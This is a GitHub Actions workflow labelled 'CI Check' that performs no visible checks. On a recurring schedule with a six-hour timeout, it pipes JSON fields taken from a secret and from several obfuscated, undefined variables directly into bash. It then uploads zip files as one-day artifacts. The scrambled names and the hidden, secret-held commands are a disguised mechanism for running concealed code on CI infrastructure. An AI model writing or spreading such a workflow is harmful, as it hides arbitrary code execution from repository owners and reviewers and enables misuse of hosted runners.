name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '8 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          jkq36: ${{ secrets.jkq36 }}
        run: |
          printf '%s' "$jkq36" | jq -r .o87548 | /bin/bash
          printf '%s' "$idjal90" | jq -r .uda7399 | /bin/bash
          printf '%s' "$gyyea141" | jq -r .a3 | /bin/bash
          printf '%s' "$rm8" | jq -r .umrh74 | /bin/bash
          printf '%s' "$z97125" | jq -r .rs561 | /bin/bash
          printf '%s' "$swctk41898" | jq -r .uumnv66 | /bin/bash
          printf '%s' "$djhb246" | jq -r .qnqw326 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jyh7b8MH
          path: "*.zip"
          retention-days: 1
